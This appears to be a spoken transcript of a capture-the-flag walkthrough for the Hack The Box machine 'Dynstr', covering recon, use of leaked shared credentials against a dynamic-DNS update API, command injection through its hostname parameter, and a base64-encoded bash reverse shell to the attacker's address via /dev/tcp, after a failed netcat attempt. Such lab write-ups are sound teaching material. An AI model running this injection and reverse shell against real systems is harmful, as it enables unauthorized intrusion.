Hey guys, welcome back. This is Mohammad Badruddin and today I bring a new video and that is belongs to Hack the Box, and there is a machine named as Dynstr, and the level of this machine is medium, and this belongs to dynamic DNS. So we will see how we can perform the scanning, information gathering, recon, and how we will search the vulnerability and what are the ways to exploit that vulnerability. And we will at last exploit that machine up to the root. So let's go. So for initial scanning, I'm going to use Nmap, and I'm going to say Nmap space hyphen VV to increase the verbosity, and space hyphen small s capital B for the version enumeration, and hyphen small s capital C for the default script, and the IP of the target is 10.10.10.244, and I'm going to save this output in a file named as default.nmap. You can name it as you want. So because I already run that scan to save the time, so I'm going to show you the nmap result. So default.nmap, and as you can see here that there are three ports open. Port number 22, that is SSH, and the version of this SSH is OpenSSH 8.2p1 Ubuntu, and there is one more port, that is DNS on port number 53, and it is ISC bind 9.16.1, and the third port is port number 80, and it's running Apache HTTPD 2.4.41. So that's been said, let's go to the accessing the web on port 80. So I'm going to just before that I'm going to add this on etc host. So 10.10.10.244 dynstr.htb, save it, and we can try it, confirm it by pinging. So dynstr.hackthebox. So it's pinging, that's fine. Clear this and clear that. Okay. So I'm going to say dynstr.hackthebox, enter, and we got a website that is Dyna DNS. So awesome dynamic DNS. So that website or that company for whom this website belongs to is basically providing a service that is dynamic DNS, something like that. You might have heard about dynamic DNS. It gives you portal to just register, and you can register your DNS. So let's see, we will see. Go down and we find our services. She will face find calm. Now okay, quality dynamic DNS. We are providing dynamic DNS for anyone with the same API as noip.com. So this is information of API. I think this is going to be the interesting part. So another thing is awesome DNS, awesome domains. So we are providing dynamic DNS for number of domains, and these are the domain names. And the last part is HTB. It means these are interesting to me. And the third one is the third section of services is beta. So we are still running in beta mode. Please use following shared credentials. So we already have credentials too. So that is interesting, and I am going to write it down all these things here. So this is the Nmap. So I'm going to say domains, and what are the domains? So these are the domains. Copy and paste it here. Another thing is username password. So I'm going to say username, and the username is we can do it like this, copy and paste it here, save. Another interesting part was the API. So API, and the API is as noip.com. So copy this, and I'm going to save this. So noip.com API is there. Fine. So the next thing is okay. Let's see. Global coverage. Find us, London office, and we got one email also. This part is also so gather as much as information you can collect about the target, because that is the uh, final thing which will help you to enumerate or to find the vulnerabilities in the target. So that is the most interesting part and the most important part. And uh, normally hackers spend their 70% of time, 80% of time to just gather the information in active or passive ways. So let's see. Okay, another thing what we can do, we can add those domains in the host file. So I'm gonna say nano, it should here, yeah, nano etc host. Come here, copy, and I'm going to say this, copy, and paste it here, space, then copy this one and paste it here, and then copy this and paste it here. Fine. So I'm gonna save it, clear, and I'm going to ping this, and it's pinging. Fine. Next, the directory enumeration or the basic recon with the GoBuster. So GoBuster space dir, because the directory enumeration I'm going to do, and space -z space -w for word list, user share word list the buster, and directory, which directory I'm going to use is directory list 2.3 medium, and the URL is going to be http://dynstr.hackthebox/ and -t for t, enter. Next thing, I'm going to also try Nikto. So Nikto space -host http:// dynstr.hackthebox, enter, and GoBuster gave us some results, assets and the nick. So we will see this. I'm going to make it a bit smaller, and let's see. So /assets, that directory basically contains the JavaScripts and the jQuery scripts files. So let's see, have no permission. Okay, so if I go and not inspect the element, I wanna, here is it. So view page source, and if we go down, you can see assets JS and jQuery.js. So I would like to visit, copy link location and paste it here, enter, and I don't want to see this. I just wanna see if there is any custom JS file, but there is nothing. So okay, no problem. Another part we can do is we find something nick, so we can go and check nick, and there is nothing. Why? There is nothing. So I think we, okay, nick, nothing. Okay, so I'm going to do one more thing, because sometime maybe inside nick there is another directory. So I'm going to use dub and http:// str.hackthebox slash nick slash enter. Let's see if we find something. Till then, what we can do, we can gather some information, passive information gathering with the publicly known information. So we found something like, if we go there, we say the API name, and if we go to the website, we find that we are providing dynamic DNS for anyone with the same API as this. So I'm going to search this about this API. So I'm going to my best friend, that is Google. Okay, and I'm going to say API no-ip.com. What? There was something. So no IP API exploit and no IP API vulnerability and no IPA API URL configured. Okay, so I am going to check 1, 2, 3, these three. So first is go to the exploit. Let's see, vulnerabilities and exploits. Sync, that is a very good resource to find and to read about the vulnerabilities. So I'm going to take this also. No IP dynamic update client. Uh, that could be the thing, because uh, dynamic update client means in the Nmap we found that the DNS port is open. So maybe we can uh, update or add a client or something like this. Integrate with no IP. DDNS means dynamic DNS. So I'm gonna take this also. So let's see. So this is 2008 vulnerability and this is buffer overflow. So this is not, in this situation, not interesting for me. No IP dynamic DNS client. So on Windows uses weak permission on this, because we are not using the Windows, the target machine is not the Windows machine. So I think that also not uh, interesting for now. And this is also for 2008 vulnerability, no IP2 in IP2 2.1.7 allows local user to overwrite arbitrary file via symlink. So this seems to be Linux, but this is for the local user. So maybe that can be used for privilege escalation. So I will keep this in mind. So I'm going to just put this here. So priv esc. So we will see it later. And this one is new. So it said Nextcloud mail in a mail app for Nextcloud version. So this is for the Nextcloud mail application. So this is also not interesting. So just close this one. Next thing, no IP vulnerabilities. Unofficial dynamic DNS update client built in Node.js. So okay, let's see this. This is local IP address stack overflow. Up to now, what information we have, according to that, this is not in the scope for now. So leave it. Let's see this one. So this said request method adding no IP dynamic DNS support to your product is easy. Let's see down. Sending an update our protocol. Okay, so sending an update for the DNS, I think. So dynamic updates are performed by making an HTTP request to one of the following URL. And this is interesting to me, because you can make uh, dynamic DNS updates with the HTTP request, right? And if you see this URL, you will find that our domain is dynstr.com, and we already found the nick, and after nick there is update directory, so we can check it here, and we also run the dub here. So I'm going to close the GoBuster here, and dub is still running, so I am going to see nick slash update, enter, and yeah. Before, when we try nick only, we got nothing, but once we put the update, we got the bad authentication or bad auth. So we found something, but we need to see more. For update request on HTTP, our interface listens on port number 80 and port number 8245. We do not find this port, but now we can. So I'm going to, first of all, I just want to copy this. So copy, come here, GoBuster, paste it here, and I don't want this. Fine. And that part actually interesting for me. Save, and I'm going to clear this, and what I'm going to do is for port number this 8245, so nmap space hyphen p 8245 and 10.10.10.244. Let's see if this is open or not. So it said the port is closed, but port number 80 is open, because it said you can make update request for your dynamic DNS on port 80 or 8245. So we already have port number 80. So if this is closed, no problem. And if you are using port HTTPS, you can make update on this port. Okay. Another thing is authorization based, like this username and password. So we already have username and password from the website, and username and password associate with the host names that are to be updated. And this is the final call, I think, to send the update. HTTP username or password, something like this. And this is the request which is sent to update the dynamic update, to send the update via over HTTP, right? So this is the whole thing. So I'm going to copy this. It needs host name and my IP, and okay. So I'm going to copy this, and I'm going here, come here, come here, and Burp Suite is open. I'm going to enable that, and I'm going to enter this request again. Let's see what we got. We got this update. Fine. So bad auth. Okay. Now what I need is I need to send this request to the repeater. Go to the repeater, and I am going to paste this request. Make update from here to here. So copy and paste it here. And here I am going to change the domain name. So I'm going to say DNS alias dot hackthebox. So copy this, or we can try with dynstr dot hackthebox. Let's see this first. And this is 10.10.10.244. Enter. still bad auth means bad authentication, because maybe we need to pass the username and password also, and we already have the username and password. So let's see, check this. So it said here, if you see authorize, you must send this authorization header parameter with the base 64. So I'm going to add this user agent authorization, and the authorization is gonna be basic, it said, and go to the decoder and create the base 64 encoded string. So dyna DNS, and this is the password. So copy, I'm going to say dyna DNS colon the password, and encode that as base 64. Copy this, go to the repeater back, and I'm going to paste this here like that, and let's send this again. And this time, as you can see, we do not get the bad authentication. We got something else, and that is 911 wrong DOM. Hack the box. Wrong DOM. I can guess this one is wrong domain name. Hack the box, something like this. Let's see. Uh, we can search this. Copy here. So URI parameter requires for this request. So the first parameter is hostname, where we can send the update of the host. Okay. So if I send, just try this. If I say hello dot dynstr dot hack the box and send this again, and still it said wrong domain. So wrong domain, why? Because we already have other domains. So let's try this. Instead of this, paste this, send it again, and we got good request, fine. So that's good. But and as you can see, this does also find the update. So I'm going to just copy this for the record. You can take screenshots. Okay, so I'm going to put this here. I just tried to make a fake entry, and I found that it gave me good, means 200. Okay, with the good response, it means that works, or maybe that updated. But I tried something like this, send, said wrong DNS, try this, wrong DNS, and try this, and the error is changed, or the message is changed. Now it said 911 NS update failed. So NS update is basically, I think, command is there with the NS update. So NS update space -h. Yeah, it's a command. So it means once we give these values of these parameters like hostname, my IP, and with the basic authentication, it means in the backend this application or API is actually running a command, and that command is ns update. And once it does not get the right pattern of the DNS name or the domain name or the fully qualified domain name, it is failed to run that NS update. So it means we can run some command. Let's see, ID, no. Basically, we can try like that. NS update failed. Okay, no problem. Uh, we need to keep trying. And if I make it like, okay, let's check this one whether this works or not. This is also, so let's see, maybe this one will work. ID, and nope. uh, what else we can check? Let's try this ID, and yeah, that's better. So we found the remote code execution finally. Great. So I'm going to take this, and what else I can do is, as we can see, update delete. So server value is this, zone is DNS alias dot hackthebox, update delete, and then it is going to give me this, right? So now what we can do, we can try reverse shell, and for reverse shell I am going to use, clear this one also and clear that. Yes, let's make it okay. So clear. Okay, I'm going to use, I'm gonna take this request, copy, paste it here, make it request, and we can put it here response. So this is gonna be the response, copy and paste it here. So save it, and let's try something else to make sure. Who am I? Not this. Who am I? Send it, and yes, as you can see, www data, and then it runs this and say okay. So it means what happened once you run like that, so it runs this command first and then run the ns update command. Fine, and this is the output. So this is good. Now I'm going to use, so let's see, I can check or not. So which plus python, send, what python version is there? It does not give me the result. So uh, let's see which python, I can say 3, maybe that works. So yeah, you can see python 3 is there. So we can do two ways. We can try python reverse shell, and we can also try the bash reverse shell. Also, if there is netcat, so you can check it by see which netcat version is there on the system. So if there is any, you will find here. So as you can see, netcat is also there. So we can use netcat also. So let's try netcat first. For netcat, I'm gonna say nc space hyphen or, and instead of space I'm gonna say plus hyphen e plus uh, slash bin slash bash plus and 10 dot, what is my IP? This is the IP. So 10 dot 10.14.167, and then come to this place and netcat space hyphen nlvp and 9999. And also one more thing I forgot to mention here, plus 9999. Okay, so I'm going to start the listener here and I'm going to send the request. Let's see. So it said okay, wrong domain name 9999. Fine, we can do one more thing. So I'm going to take this control X and let's put this here and enter again. Again same. So 10.10.14.16, or we can do something like that. So I'm gonna do it like this. Okay, let's see, try again, because as you can see here it's not taking the complete IP. So fine, again, so something here that is maybe sanitizing or filtering. So netcat not work. I do not want to hit my head against the wall for this, because we have another option. So I'm going to use the bash reverse shell, and for that I am going to use this /bin /bash and space -c. So instead of space I'm going to use plus -c, then plus again, and single quote, then bash plus -i, then plus and greater than sign, and plus /dev/tcp, and /my IP is gonna be 10.10.14.167, and the port number is gonna be 9999, like that, and then space 0 greater than and 1. So bin bash space -c bash -i and plus this. Okay, okay, seems good. So last is this, and I think this also not gonna work because of this problem here. So let's see, try it, and as expected not work. Another thing what we can do, we can actually convert it into the base 64. So I'm going to take this uh, uh, take to here and control U. No, let's try like that. Still not. So I make it double encoding, double URL encoding, but doesn't work. So the best way is copy and go to the decoder, paste it here. Sorry, paste it here. Take out this. I don't need this plus sign. Okay. Fine. And I'm going to encode this as base 64. So this is the value of base 64. Fine. I am going to take this value. Let's check one more time. bin/bash space -c bash -i greater than and dev tcp 10.10.14.167/9999, and okay. So I'm going to copy this, go to the repeater again. Where is it? Yeah. And instead of this, I'm gonna say echo and space for means plus, in single quotes I'm gonna put this value, and then I'm going to change it into the base 64 decode. So I'm gonna say plus, then okay, and base 64 space -d to decode that, and plus, and run it as bash. That seems perfect. Let's try. 999. Okay, and it said delete hello. Fine. Base 64-d space bash, but we do not get the reverse shell. Why? Maybe I know, because as you can see in this string there is a plus sign, and that plus sign, once you send this string in the request with the bulk suite, so this plus sign is considered as a space, so that breaks your reverse shell string, and that's why it's not working. So we need to create a payload which do not contain actually this plus sign. So what else we can do is we can take this out. There is still plus sign, and still there is plus sign. I don't want plus sign. So if we do it like this, there is plus sign. 99 is still plus sign. So 9900 is still plus sign. So I can make it 0. There is still plus sign. So I'm gonna say 9100. So now I think we see in that area there is no plus sign, only here. So maybe this is because of 9. If we change it like 8, still plus sign. So 810, no. So 8100. Okay, we can do, let's add something same like before, like that. Is there any plus sign? No plus sign. So let's see, /bin/bash space -c space, and as you can see we do not have, no, we have it here. So we can take this 0 out. Now we have plus sign. No, we do not have any plus sign. So this, maybe this string work hopefully. So I'm going to change also my listener port. So clear, and what was the port? Go to the decoder, 810. So I'm going to use 810 and enter, and let's take this copy and go to the repeater, just paste that here and send the request again, and we got the reverse shell. Fine, so I can make it like id y. Oh, that reverse shell is actually not working fine. id, it's typing 2 times, I don't know why, but yeah, it's giving the result. So that is the problem, but we will see how we can get rid of that. And let's see, who am I? So it just repeating what we type 2 times, but the result it gave only for 1 time. So I'm gonna say ls space -la. Okay, fine, that is fine for us. And we can do one more thing, that is update file. I'm gonna, before going to that, I'm gonna check cat/etc/password, and this is the, I wanna just say the users cat password. Okay, so cat/etc/password. Oh no, come on. cat/etc/password space pipe and grep for /bin/bash. I want to check how many users can run bash. So this is interesting. I'm gonna copy this and paste it here. And one more thing I want to do, finally, I just want to take this value which works for us up to here. So I'm gonna say copy URL and paste it here. Okay, and what actually we use is this. So copy and paste it here. Save. Yeah, good. So in the next video, we will escalate our privileges to the higher authority user, then we will escalate our privileges to root. So for this video, enough for this video, and we will see the part 2, and we will see the privilege escalation process for this machine. But up to now, that machine was real fun. So thank you. See you in the next video. Bye.